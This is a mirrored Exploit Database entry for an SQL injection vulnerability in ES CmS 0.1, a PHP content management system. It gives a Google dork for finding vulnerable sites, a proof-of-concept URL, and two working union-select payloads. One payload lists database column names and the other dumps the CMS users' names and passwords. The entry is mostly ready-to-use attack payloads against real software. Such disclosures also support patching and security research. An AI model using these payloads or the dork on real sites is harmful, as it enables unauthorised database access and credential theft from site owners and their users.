ES CmS 0.1 – SQL Injection

• Exploit Database
• 9 阅读

• 作者： hossein beizaee
  日期： 2012-11-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/22907/

• # Exploit Title: ES CmS 0.1 Sql Injection Vulnerability
  
  # Google Dork: inurl:/page.php?id=
  
  # Date: 2012
  
  # Exploit Author: MR.XpR
  
  # Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip
  
  # Version: v.0.1
  
  # Tested on: BT , 7
  
  
  # Poc :
  
  http://localhost/page.php?id=[sqli]
  
  
  # D3mo : 
  
  http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.c​olumns+where+table_name=char(table_cod)
  
  http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users
  
  
  # TNx To : 
  
  My Brothers Siamak.Black(Black.Boy) , UnknowN
  
   everything is not true ,The real is dream